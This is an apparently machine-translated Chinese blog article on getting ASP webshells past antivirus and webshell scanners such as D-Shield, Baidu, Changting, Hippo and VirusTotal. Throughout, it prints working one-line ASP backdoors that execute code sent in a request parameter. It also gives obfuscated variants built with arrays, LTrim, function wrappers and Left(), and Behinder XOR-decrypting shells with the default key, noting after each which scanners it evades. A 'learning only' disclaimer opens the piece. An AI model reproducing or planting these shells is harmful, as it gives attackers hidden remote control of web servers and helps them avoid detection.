Discussion on ASP webshell+ ice scorpion free horse killing

Preface ：
This article is only for infiltration and communication learning , Due to the spread of 、 Any direct or indirect consequences and losses caused by using the information provided in this article , All by the user's own responsibility , The author of this article is not responsible for this

Text ：
asp There are many ways to avoid killing
Personally, the core of avoiding killing is confusion + Change the order of execution .
about asp for , The utilization characteristics of the former :: These go around The latter is to use function arrays + Class approach Personally, the latter technique is used most

Same thing
Throw it here first 2 individual bypass My pony

The pony

bypass The pony 1

Content
password 404

<%
dim a(5)
a(0) = request("404")
b = LTrim(a(0))
response.write b
eXecUTe(b)
%>

bypass process analysis ：
The most basic sentence

<%
eXecUTe(request("404"))
%>

Look at the effect
There's nothing to say It must be the one being investigated
Add something to go in and have a look
Demote to level 4 after splitting


Introducing arrays

<%
dim a(5)
a(0)=request("404")
eXecUTe(a(0))
%>

Already bypass d The shield is broken Baidu Changting But hippos and vt Not all Then find a way to deal with it

Baidu

Changting's

vt

Hippo

Add interference function LTrim() When you go in, it's completely bypass Of That is, successful bypass 了

<%
dim a(5)
a(0) = request("404")
b = LTrim(a(0))
response.write b
eXecUTe(b)
%>

Hippo

vt

bypass The pony 2

Just use the idea of function bypass
Take the function horse in the rain Cistanche boss to do bypass Well

<%

Function b():
    b = request("404")
End Function


Function f():
    eXecUTe(b())
End Function
f()

%>

The effect is OK at present ： Not yet completely marked The logo is currently 1 level
Add one left Function go in and take a look

<%
Function b()
     b = request("404")
End Function
Function f():
     x=b()
     y=Left(x,99999)
     execute(y)
End Function
f()
%>

Just bypass In the past the
d shield

Hippo

Baidu

Changting

vt

Ice scorpion horse

There is one saying. asp I don't particularly like using ice scorpions Some environments are very strange Not even
But write it out
Basic ice scorpion

<%
Response.CharSet = "UTF-8" 
k="e45e329feb5d925b" ' The key is the connection password 32 position md5 Before the value 16 position , Default connection password rebeyond
Session("k")=k
size=Request.TotalBytes
content=Request.BinaryRead(size)
For i=1 To size
result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))
Next
execute(result)
%>

Beyond all doubt Direct level five

utilize bypass Ideas
Split method

<%
Response.CharSet = "UTF-8" 
k="e45e329feb5d925b" ' The key is the connection password 32 position md5 Before the value 16 position , Default connection password rebeyond
Session("k")=k
size=Request.TotalBytes
content=Request.BinaryRead(size)
For i=1 To size
x=ascb(midb(content,i,1))
y=Asc(Mid(k,(i and 15)+1,1))
z=z&Chr( x Xor y)
Next
execute(z)
%>

d shield

Changting

vt

Baidu

vt